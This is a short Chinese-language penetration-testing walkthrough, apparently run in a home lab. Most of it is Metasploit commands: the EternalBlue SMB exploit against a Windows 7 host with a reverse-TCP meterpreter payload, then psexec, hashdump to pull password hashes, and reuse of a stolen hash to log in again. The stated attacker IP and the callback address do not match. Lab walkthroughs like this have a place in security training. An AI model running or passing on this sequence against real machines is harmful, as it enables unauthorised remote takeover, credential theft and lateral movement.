讲述Metasploit获取到hash值的渗透测试。
测试环境
目标机:
Windows 7 Ultimate
192.168.1.9
攻击机:
Linux 4.6.0-kali1-amd64
192.168.1.31
攻击机姿势(永恒之蓝):
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.1.9
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.12
exploit
获得shell
Metasploit之Hash值传递渗透
进入metasploit环境下进行操作
use exploit/windows/smb/psexec -->使用这个渗透攻击模块
show options -->查看配置选项
set RHOST 192.168.1.9 -->设置攻击目标192.168.1.9 ,端口默认445
set SMBUser tdcoming -->设置账号为 tdcoming
exploit -->执行攻击
成功后获得meterpreter的反弹连接
hashdump -->获取hash值
使用hash值登陆
exit -->从meterpreter的反弹连接中返回到“msf exploit(psexec)>”
set smbpass hash值 -->设置hash值
exploit -->再次登陆一遍